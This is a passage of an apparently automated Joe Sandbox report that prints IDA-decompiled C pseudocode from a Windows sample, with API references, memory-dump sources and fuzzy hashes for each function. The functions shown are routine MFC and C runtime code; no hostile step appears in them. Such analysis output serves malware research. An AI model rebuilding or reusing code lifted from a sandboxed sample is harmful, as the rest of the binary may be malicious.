                  				unsigned int _t23;
                  				char* _t35;
                  				struct HBITMAP__* _t37;
                  				unsigned int _t40;
                  				signed short _t42;
                  				intOrPtr _t46;
                  				int _t47;
                  				unsigned int _t49;
                  				void* _t52;
                  				signed char* _t53;
                  				void* _t54;
                  				signed int _t58;
                  				intOrPtr _t59;
                  				void* _t60;
                  				signed int _t62;
                  				void* _t63;
                  				intOrPtr _t64;
                  				signed int _t66;
                  				signed int _t68;
                  
                  				_t52 = __edx;
                  				_t66 = _t68;
                  				_t21 =  *0x463404; // 0x38a11573
                  				_v8 = _t21 ^ _t66;
                  				_push(_t60);
                  				_push(_t54);
                  				_t23 = GetMenuCheckMarkDimensions();
                  				_t47 = _t23;
                  				_t40 = _t23 >> 0x10;
                  				_v144 = _t47;
                  				_v140 = _t40;
                  				if(_t47 <= 4) {
                  					L3:
                  					E00406436(_t40, _t47, _t54, _t60, _t73);
                  				} else {
                  					_t73 = _t40 - 5;
                  					if(_t40 <= 5) {
                  						goto L3;
                  					}
                  				}
                  				if(_t47 > 0x20) {
                  					_t47 = 0x20;
                  					_v144 = _t47;
                  				}
                  				asm("cdq");
                  				_t62 = _t47 + 0xf >> 4;
                  				_t58 = (_t47 - 4 - _t52 >> 1) + (_t62 << 4) - _t47;
                  				if(_t58 > 0xc) {
                  					_t58 = 0xc;
                  				}
                  				if(_t40 > 0x20) {
                  					_t40 = 0x20;
                  					_v140 = _t40;
                  				}
                  				E00431160(_t58,  &_v136, 0xff, 0x80);
                  				_t35 = _t66 + (_t40 - 6 >> 1) * _t62 * 2 - 0x84;
                  				_t53 = 0x4514b4;
                  				_t63 = _t62 + _t62;
                  				_v148 = 5;
                  				do {
                  					_t42 = ( *_t53 & 0x000000ff) << _t58;
                  					_t53 =  &(_t53[1]);
                  					_t49 =  !_t42 & 0x0000ffff;
                  					 *_t35 = _t49 >> 8;
                  					 *(_t35 + 1) = _t49;
                  					_t35 = _t35 + _t63;
                  					_t15 =  &_v148;
                  					 *_t15 = _v148 - 1;
                  				} while ( *_t15 != 0);
                  				_t37 = CreateBitmap(_v144, _v140, 1, 1,  &_v136);
                  				_pop(_t59);
                  				_pop(_t64);
                  				 *0x466560 = _t37;
                  				_pop(_t46);
                  				if(_t37 == 0) {
                  					 *0x466560 = _t37;
                  				}
                  				return E00430650(_t37, _t46, _v8 ^ _t66, _t53, _t59, _t64);
                  			}
































                  APIs
                  • GetMenuCheckMarkDimensions.USER32 ref: 004128C1
                  • _memset.LIBCMT ref: 00412939
                  • CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 0041299C
                  • LoadBitmapA.USER32 ref: 004129B4
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu_memset
                  • String ID:
                  • API String ID: 4271682439-3916222277
                  • Opcode ID: b5f77ca9ce8d0de09fb24572092bc98af35eea4ddacb5d1be8eaecbc8a1ea975
                  • Instruction ID: 38b95418af95e8854720099d7e8ddae421d8a6e1ae950d27b7bdda4e2e8a65fc
                  • Opcode Fuzzy Hash: b5f77ca9ce8d0de09fb24572092bc98af35eea4ddacb5d1be8eaecbc8a1ea975
                  • Instruction Fuzzy Hash: F6312971A002159FEB20CF299D85BE97BB4FB44304F4541BBF549E7292DB748D84CB54
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 96%
                  			E0040B638(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                  				intOrPtr _t39;
                  				intOrPtr _t47;
                  				intOrPtr _t65;
                  				void* _t68;
                  				void* _t69;
                  
                  				_t63 = __edx;
                  				_t53 = __ebx;
                  				_push(0x28);
                  				E00431B04(E0044AF3A, __ebx, __edi, __esi);
                  				_t65 =  *((intOrPtr*)(_t69 + 8));
                  				_t68 = __ecx;
                  				E004014C0(_t69 - 0x34, __edx);
                  				 *(_t69 - 4) =  *(_t69 - 4) & 0x00000000;
                  				if((E00412B38(_t68) & 0x00004000) == 0) {
                  					_t32 =  *((intOrPtr*)(_t68 + 0xc4));
                  					_t57 = _t69 - 0x34;
                  					E00405E21(_t69 - 0x34, __edx,  *((intOrPtr*)(_t68 + 0xc4)),  *((intOrPtr*)(_t32 - 0xc)));
                  					if(_t65 != 0) {
                  						E00405EC1(_t69 - 0x34, " - ");
                  						_t57 = _t69 - 0x34;
                  						E00405EC1(_t69 - 0x34, _t65);
                  						_t39 =  *((intOrPtr*)(_t68 + 0x58));
                  						if(_t39 > 0) {
                  							swprintf(_t69 - 0x30, 0x20, ":%d", _t39);
                  							_t57 = _t69 - 0x34;
                  							E00405EC1(_t69 - 0x34, _t69 - 0x30);
                  						}
                  					}
                  					L9:
                  					_t66 =  *((intOrPtr*)(_t69 - 0x34));
                  					E0041FC5A(_t57, _t63,  *((intOrPtr*)(_t68 + 0x20)),  *((intOrPtr*)(_t69 - 0x34)));
                  					E004010B0(_t66 - 0x10, _t63);
                  					return E00431B87(_t53, _t66, _t68);
                  				}
                  				if(_t65 == 0) {
                  					L5:
                  					_t44 =  *((intOrPtr*)(_t68 + 0xc4));
                  					_t57 = _t69 - 0x34;
                  					E00405E21(_t69 - 0x34, _t63,  *((intOrPtr*)(_t68 + 0xc4)),  *((intOrPtr*)(_t44 - 0xc)));
                  					goto L9;
                  				}
                  				E00405EC1(_t69 - 0x34, _t65);
                  				_t47 =  *((intOrPtr*)(_t68 + 0x58));
                  				if(_t47 > 0) {
                  					swprintf(_t69 - 0x30, 0x20, ":%d", _t47);
                  					E00405EC1(_t69 - 0x34, _t69 - 0x30);
                  				}
                  				E00405EC1(_t69 - 0x34, " - ");
                  				goto L5;
                  			}








                  APIs
                  • __EH_prolog3_GS.LIBCMT ref: 0040B63F
                    • Part of subcall function 00412B38: GetWindowLongA.USER32 ref: 00412B43
                  • swprintf.LIBCMT ref: 0040B683
                    • Part of subcall function 00431BA5: __vsprintf_s_l.LIBCMT ref: 00431BB9
                  • swprintf.LIBCMT ref: 0040B6F7
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: swprintf$H_prolog3_LongWindow__vsprintf_s_l
                  • String ID: - $:%d
                  • API String ID: 949706672-2359489159
                  • Opcode ID: d0422e2dded8b7fd773f17d4d3136ba2301167d030006d4a28d0c87d5d88689d
                  • Instruction ID: 25aa097095ec528b029b11460ad35e3228e7385f7c42c63496193b1bf4d06049
                  • Opcode Fuzzy Hash: d0422e2dded8b7fd773f17d4d3136ba2301167d030006d4a28d0c87d5d88689d
                  • Instruction Fuzzy Hash: A3213271911604ABDB14FB91D952EAFBB79EF14705F10042FB541B32D2EB38AB05CB98
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 58%
                  			E0040C509(void* __edi, intOrPtr _a4, intOrPtr* _a8) {
                  				void _v20;
                  				int _t14;
                  				int _t18;
                  				intOrPtr* _t23;
                  				void* _t25;
                  
                  				if(E0040C354() == 0) {
                  					if(_a4 != 0x12340042) {
                  						L9:
                  						_t14 = 0;
                  						L10:
                  						return _t14;
                  					}
                  					_t23 = _a8;
                  					if(_t23 == 0 ||  *_t23 < 0x28 || SystemParametersInfoA(0x30, 0,  &_v20, 0) == 0) {
                  						goto L9;
                  					} else {
                  						 *((intOrPtr*)(_t23 + 4)) = 0;
                  						 *((intOrPtr*)(_t23 + 8)) = 0;
                  						 *((intOrPtr*)(_t23 + 0xc)) = GetSystemMetrics(0);
                  						_t18 = GetSystemMetrics(1);
                  						asm("movsd");
                  						asm("movsd");
                  						asm("movsd");
                  						asm("movsd");
                  						 *(_t23 + 0x10) = _t18;
                  						 *((intOrPtr*)(_t23 + 0x24)) = 1;
                  						if( *_t23 >= 0x48) {
                  							E00433504(_t25, _t23 + 0x28, 0x20, "DISPLAY", 0x1f);
                  						}
                  						_t14 = 1;
                  						goto L10;
                  					}
                  				}
                  				return  *0x466328(_a4, _a8);
                  			}








                  APIs
                  • SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 0040C549
                  • GetSystemMetrics.USER32 ref: 0040C561
                  • GetSystemMetrics.USER32 ref: 0040C568
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: System$Metrics$InfoParameters
                  • String ID: B$DISPLAY
                  • API String ID: 3136151823-3316187204
                  • Opcode ID: 21211c0dfc0b0310e6e94eb9e5fcc5913642c798adf72206dc1ed171178922e0
                  • Instruction ID: 791c3770960fa488d4c8b65a8903be86f79acb93c7c19c9457816c0bfd0009e2
                  • Opcode Fuzzy Hash: 21211c0dfc0b0310e6e94eb9e5fcc5913642c798adf72206dc1ed171178922e0
                  • Instruction Fuzzy Hash: DC11C475500334FBDB119F658CC1A5BBBA8EF0A751F0441B2FD05BA186D2B4E940CBD9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E0041765C(void* __ebx, void* __ecx, void* __edx, void* __eflags, struct HWND__** _a4) {
                  				void* __edi;
                  				struct HWND__* _t10;
                  				struct HWND__* _t12;
                  				struct HWND__* _t14;
                  				struct HWND__* _t15;
                  				int _t19;
                  				void* _t21;
                  				void* _t25;
                  				struct HWND__** _t26;
                  				void* _t27;
                  
                  				_t25 = __edx;
                  				_t21 = __ebx;
                  				_t26 = _a4;
                  				_t27 = __ecx;
                  				if(E0040CD15(__ecx, __eflags, _t26) == 0) {
                  					_t10 = E0040F8D7(__ecx);
                  					__eflags = _t10;
                  					if(_t10 == 0) {
                  						L5:
                  						__eflags = _t26[1] - 0x100;
                  						if(_t26[1] != 0x100) {
                  							L13:
                  							return E0040D369(_t26);
                  						}
                  						_t12 = _t26[2];
                  						__eflags = _t12 - 0x1b;
                  						if(_t12 == 0x1b) {
                  							L8:
                  							__eflags = GetWindowLongA( *_t26, 0xfffffff0) & 0x00000004;
                  							if(__eflags == 0) {
                  								goto L13;
                  							}
                  							_t14 = E0041FE04(_t21, _t25, _t26, __eflags,  *_t26, "Edit");
                  							__eflags = _t14;
                  							if(_t14 == 0) {
                  								goto L13;
                  							}
                  							_t15 = GetDlgItem( *(_t27 + 0x20), 2);
                  							__eflags = _t15;
                  							if(_t15 == 0) {
                  								L12:
                  								SendMessageA( *(_t27 + 0x20), 0x111, 2, 0);
                  								goto L1;
                  							}
                  							_t19 = IsWindowEnabled(_t15);
                  							__eflags = _t19;
                  							if(_t19 == 0) {
                  								goto L13;
                  							}
                  							goto L12;
                  						}
                  						__eflags = _t12 - 3;
                  						if(_t12 != 3) {
                  							goto L13;
                  						}
                  						goto L8;
                  					}
                  					__eflags =  *(_t10 + 0x68);
                  					if( *(_t10 + 0x68) == 0) {
                  						goto L5;
                  					}
                  					return 0;
                  				}
                  				L1:
                  				return 1;
                  			}

                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID:
                  • String ID: Edit
                  • API String ID: 0-554135844
                  • Opcode ID: e5a8fbd5211fc8f9753fdabb740f9ce976cc7a36ade03de3bd11c94130eaabfa
                  • Instruction ID: 5a368e719720fe148af9716c8c30e3ccc30df2ef8c2af582a91a041a80413f67
                  • Opcode Fuzzy Hash: e5a8fbd5211fc8f9753fdabb740f9ce976cc7a36ade03de3bd11c94130eaabfa
                  • Instruction Fuzzy Hash: 4D117031308A05ABEB20573A8D05B9BB679BF45760F24443BF901E21A1EF78DC91C56D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 88%
                  			E00405AD1(void* __ebx, void* __edi, void* __esi, void* __eflags, char _a4, intOrPtr _a8, char _a12) {
                  				intOrPtr* _v0;
                  				void* _v4;
                  				signed int _v8;
                  				intOrPtr _v16;
                  				void* _t20;
                  				intOrPtr* _t23;
                  				void* _t29;
                  				void* _t31;
                  				intOrPtr _t35;
                  				char _t36;
                  				void* _t44;
                  
                  				_t44 = __eflags;
                  				_t38 = __esi;
                  				_t37 = __edi;
                  				_t31 = __ebx;
                  				_push(4);
                  				E00431A9B(E0044B3B5, __ebx, __edi, __esi);
                  				_t35 = E00404461(_t44, 0xc);
                  				_v16 = _t35;
                  				_t20 = 0;
                  				_v4 = 0;
                  				if(_t35 != 0) {
                  					_t20 = E00405A9D(_t35);
                  				}
                  				_t36 = _a4;
                  				_v8 = _v8 | 0xffffffff;
                  				 *((intOrPtr*)(_t20 + 8)) = _t36;
                  				_a4 = _t20;
                  				E00430CF4( &_a4, 0x45b150);
                  				asm("int3");
                  				_t23 = _v0;
                  				_push(_t31);
                  				if(_t23 != 0) {
                  					 *_t23 = 0;
                  				}
                  				if(FormatMessageA(0x1100, 0,  *(_t36 + 8), 0x800,  &_a12, 0, 0) != 0) {
                  					_t15 =  &_a4; // 0x4148e3
                  					E004048ED(0, _t36, _t37, _t38,  *_t15, _a8, _a12, 0xffffffff);
                  					LocalFree(_a12);
                  					_t29 = 1;
                  					__eflags = 1;
                  				} else {
                  					_t12 =  &_a4; // 0x4148e3
                  					 *((char*)( *_t12)) = 0;
                  					_t29 = 0;
                  				}
                  				return _t29;
                  			}

                  APIs
                  • __EH_prolog3.LIBCMT ref: 00405AD8
                    • Part of subcall function 00404461: _malloc.LIBCMT ref: 0040447F
                  • __CxxThrowException@8.LIBCMT ref: 00405B0E
                  • FormatMessageA.KERNEL32(00001100,00000000,?,00000800,004010A6,00000000,00000000,00000000,?,00406452,0045B150,00000004,004010A6,00000000,004148E3,00000000), ref: 00405B39
                    • Part of subcall function 004048ED: __cftof.LIBCMT ref: 004048FE
                  • LocalFree.KERNEL32(?,004010A6,00000000,004148E3,00000000,0041F372,00406452), ref: 00405B62
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Exception@8FormatFreeH_prolog3LocalMessageThrow__cftof_malloc
                  • String ID: HA
                  • API String ID: 1808948168-3712622743
                  • Opcode ID: c1bf25199e3fa9a73dcb31677cf4f596e0736fe5850b581e3f562f937981647b
                  • Instruction ID: 21ddc8a050848d7037dad2c523769ca223fa60ecfca11e4f480c40ccccb07167
                  • Opcode Fuzzy Hash: c1bf25199e3fa9a73dcb31677cf4f596e0736fe5850b581e3f562f937981647b
                  • Instruction Fuzzy Hash: EE11A371604249AFDB00DFA4CC81DAE3BA8FB08354F10853AFA29DA2D1D7759950CF18
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 51%
                  			E0041D29B(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                  				_Unknown_base(*)()* _t19;
                  				intOrPtr _t24;
                  				void* _t30;
                  				void* _t34;
                  				void* _t35;
                  				void* _t36;
                  
                  				_t36 = __eflags;
                  				_t30 = __edx;
                  				_push(4);
                  				E00431A9B(E0044BD4B, __ebx, __edi, __esi);
                  				_t34 = __ecx;
                  				E00405562(_t35 - 0x10, _t36, __ecx + 0xc);
                  				 *((intOrPtr*)(_t35 - 4)) = 0;
                  				E00428DD4(__ebx, __ecx);
                  				_t24 =  *((intOrPtr*)(_t35 - 0x10));
                  				if( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x10)) - 0xc)) != 0) {
                  					_t19 = GetProcAddress(GetModuleHandleA("KERNEL32"), "ReplaceFileA");
                  					if(_t19 == 0) {
                  						L3:
                  						E004289DA(_t24);
                  						E004289B2( *((intOrPtr*)(_t34 + 0x10)), _t24);
                  					} else {
                  						_push(0);
                  						_push(0);
                  						_push(0);
                  						_push(0);
                  						_push( *((intOrPtr*)(_t34 + 0x10)));
                  						_push(_t24);
                  						if( *_t19() == 0) {
                  							goto L3;
                  						}
                  					}
                  				}
                  				return E00431B73(E004010B0(_t24 - 0x10, _t30));
                  			}

                  APIs
                  • __EH_prolog3.LIBCMT ref: 0041D2A2
                    • Part of subcall function 00428DD4: CloseHandle.KERNEL32(00000001,00000000,?,00429005,00000214,0041D43D), ref: 00428DE5
                    • Part of subcall function 00428DD4: GetLastError.KERNEL32(?,00000000,?,00429005,00000214,0041D43D), ref: 00428E0A
                  • GetModuleHandleA.KERNEL32(KERNEL32,?,00000004), ref: 0041D2D1
                  • GetProcAddress.KERNEL32(00000000,ReplaceFileA), ref: 0041D2DD
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Handle$AddressCloseErrorH_prolog3LastModuleProc
                  • String ID: KERNEL32$ReplaceFileA
                  • API String ID: 2918978038-852406001
                  • Opcode ID: b864da9d03b05b9abddfc5d24e857228753dc41ff1896ebf6b2d3a24ab6a7b79
                  • Instruction ID: 254d07cfdc885de2a667c59ca4814af56d0ccb4f5cbbd3dd343bfd892108a465
                  • Opcode Fuzzy Hash: b864da9d03b05b9abddfc5d24e857228753dc41ff1896ebf6b2d3a24ab6a7b79
                  • Instruction Fuzzy Hash: 33F081B0600654ABD721EBB6CC8AD6FB3B9FF84705740495FF42297591EF38A844CB29
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 28%
                  			E004358C8(void* __ebx, void* __ecx, void* __edx, intOrPtr* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                  				void* __ebp;
                  				void* _t20;
                  				void* _t22;
                  				void* _t23;
                  				void* _t25;
                  				intOrPtr* _t26;
                  				void* _t27;
                  				void* _t28;
                  
                  				_t27 = __esi;
                  				_t26 = __edi;
                  				_t25 = __edx;
                  				_t23 = __ecx;
                  				_t22 = __ebx;
                  				_t30 = _a20;
                  				if(_a20 != 0) {
                  					_push(_a20);
                  					_push(__ebx);
                  					_push(__esi);
                  					_push(_a4);
                  					E00435836(__ebx, __edi, __esi, _t30);
                  					_t28 = _t28 + 0x10;
                  				}
                  				_t31 = _a28;
                  				_push(_a4);
                  				if(_a28 != 0) {
                  					_push(_a28);
                  				} else {
                  					_push(_t27);
                  				}
                  				E004302A3(_t23);
                  				_push( *_t26);
                  				_push(_a16);
                  				_push(_a12);
                  				_push(_t27);
                  				E004352A0(_t22, _t25, _t26, _t27, _t31);
                  				_push(0x100);
                  				_push(_a24);
                  				_push(_a16);
                  				 *((intOrPtr*)(_t27 + 8)) =  *((intOrPtr*)(_t26 + 4)) + 1;
                  				_push(_a8);
                  				_push(_t27);
                  				_push(_a4);
                  				_t20 = E0043551B(_t22,  *((intOrPtr*)(_t22 + 0xc)), _t25, _t26, _t27, _t31);
                  				if(_t20 != 0) {
                  					E0043026A(_t20, _t27);
                  					return _t20;
                  				}
                  				return _t20;
                  			}

                  APIs
                  • ___BuildCatchObject.LIBCMT ref: 004358DB
                    • Part of subcall function 00435836: ___BuildCatchObjectHelper.LIBCMT ref: 0043586C
                  • _UnwindNestedFrames.LIBCMT ref: 004358F2
                  • ___FrameUnwindToState.LIBCMT ref: 00435900
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                  • String ID: DE$csm
                  • API String ID: 2163707966-3980990743
                  • Opcode ID: 6b256480bc585ba215f2ccafec540f3fca98b31abab1096497f4781aab07a5e9
                  • Instruction ID: 4c93dfeaa140ac3f5d2b4f82d40a9fa80780d601a1f8fe3fc85248c70ccae2aa
                  • Opcode Fuzzy Hash: 6b256480bc585ba215f2ccafec540f3fca98b31abab1096497f4781aab07a5e9
                  • Instruction Fuzzy Hash: 0901E47100150ABBDF166E52CC45EAB7F6AEF0C358F009016BD1815121DB3A99B1EBA9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 68%
                  			E0042277C(void* __ecx, intOrPtr _a4) {
                  				struct HINSTANCE__* _t4;
                  				_Unknown_base(*)()* _t5;
                  				void* _t9;
                  				void* _t10;
                  
                  				_t10 = __ecx;
                  				_t4 = GetModuleHandleA("GDI32.DLL");
                  				_t9 = 0;
                  				_t5 = GetProcAddress(_t4, "SetLayout");
                  				if(_t5 == 0) {
                  					if(_a4 != 0) {
                  						_t9 = 0xffffffff;
                  						SetLastError(0x78);
                  					}
                  				} else {
                  					_t9 =  *_t5( *((intOrPtr*)(_t10 + 4)), _a4);
                  				}
                  				return _t9;
                  			}

                  APIs
                  • GetModuleHandleA.KERNEL32(GDI32.DLL), ref: 0042278A
                  • GetProcAddress.KERNEL32(00000000,SetLayout), ref: 00422798
                  • SetLastError.KERNEL32(00000078), ref: 004227B8
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: AddressErrorHandleLastModuleProc
                  • String ID: GDI32.DLL$SetLayout
                  • API String ID: 4275029093-2147214759
                  • Opcode ID: e540bd1042b3f68eb9b6f0ed1f5cd4fb6be716e9388cfb093c8fcd2548240629
                  • Instruction ID: 395a0e9ebdf5a2e1b80e510cae3e67cf4d98a6f7501344e6daefd505b8f3eb0f
                  • Opcode Fuzzy Hash: e540bd1042b3f68eb9b6f0ed1f5cd4fb6be716e9388cfb093c8fcd2548240629
                  • Instruction Fuzzy Hash: 07E02B373002147B82111F66AD0890A7E56E7C5B723658133F925D3290CA7588418768
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 74%
                  			E00435257(void* __edx, void* __edi, void* __esi, intOrPtr* _a4) {
                  				signed int _v8;
                  				intOrPtr _t11;
                  				intOrPtr* _t15;
                  				intOrPtr* _t19;
                  				void* _t23;
                  
                  				_t26 = __esi;
                  				_t25 = __edi;
                  				_t24 = __edx;
                  				_t11 =  *((intOrPtr*)( *_a4));
                  				if(_t11 == 0xe0434f4d) {
                  					__eflags =  *((intOrPtr*)(E00436178(_t23, __edx, __edi, __eflags) + 0x90));
                  					if(__eflags > 0) {
                  						_t15 = E00436178(_t23, __edx, __edi, __eflags) + 0x90;
                  						 *_t15 =  *_t15 - 1;
                  						__eflags =  *_t15;
                  					}
                  					goto L5;
                  				} else {
                  					_t32 = _t11 - 0xe06d7363;
                  					if(_t11 != 0xe06d7363) {
                  						L5:
                  						__eflags = 0;
                  						return 0;
                  					} else {
                  						 *(E00436178(_t23, __edx, __edi, _t32) + 0x90) =  *(_t16 + 0x90) & 0x00000000;
                  						_push(8);
                  						_push(0x45e1d0);
                  						E00431818(_t23, __edi, __esi);
                  						_t19 =  *((intOrPtr*)(E00436178(_t23, __edx, _t25, _t32) + 0x78));
                  						if(_t19 != 0) {
                  							_v8 = _v8 & 0x00000000;
                  							 *_t19();
                  							_v8 = 0xfffffffe;
                  						}
                  						return E0043185D(E0043BF7D(_t23, _t24, _t25, _t26));
                  					}
                  				}
                  			}

                  APIs
                  • __getptd.LIBCMT ref: 00435271
                    • Part of subcall function 00436178: __getptd_noexit.LIBCMT ref: 0043617B
                    • Part of subcall function 00436178: __amsg_exit.LIBCMT ref: 00436188
                  • __getptd.LIBCMT ref: 00435282
                  • __getptd.LIBCMT ref: 00435290
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: __getptd$__amsg_exit__getptd_noexit
                  • String ID: MOC$csm
                  • API String ID: 803148776-1389381023
                  • Opcode ID: f833f7341121851217e10f26a012840fe280062e9fc8dff470913a4d62912fc6
                  • Instruction ID: ce40cc71b876635b456ab49842eecf86f574a445523513ec0804e5d9cbf1e949
                  • Opcode Fuzzy Hash: f833f7341121851217e10f26a012840fe280062e9fc8dff470913a4d62912fc6
                  • Instruction Fuzzy Hash: 33E04F35500205AFCB60ABA5C446B6E33A4EB4E318F16A1E7E40CC7323C77CD850994A
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 68%
                  			E00422744(signed int __ecx) {
                  				_Unknown_base(*)()* _t3;
                  				signed int _t7;
                  				signed int _t8;
                  
                  				_t7 = __ecx;
                  				_t3 = GetProcAddress(GetModuleHandleA("GDI32.DLL"), "GetLayout");
                  				if(_t3 == 0) {
                  					_t8 = _t7 | 0xffffffff;
                  					SetLastError(0x78);
                  				} else {
                  					_t8 =  *_t3( *((intOrPtr*)(_t7 + 4)));
                  				}
                  				return _t8;
                  			}

                  APIs
                  • GetModuleHandleA.KERNEL32(GDI32.DLL,?,00425A15), ref: 0042274E
                  • GetProcAddress.KERNEL32(00000000,GetLayout), ref: 0042275A
                  • SetLastError.KERNEL32(00000078), ref: 00422772
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: AddressErrorHandleLastModuleProc
                  • String ID: GDI32.DLL$GetLayout
                  • API String ID: 4275029093-2396518106
                  • Opcode ID: b6a56586d83474ba617ffbc4177e26df6ea37e987274d3318c0e5c86094dc973
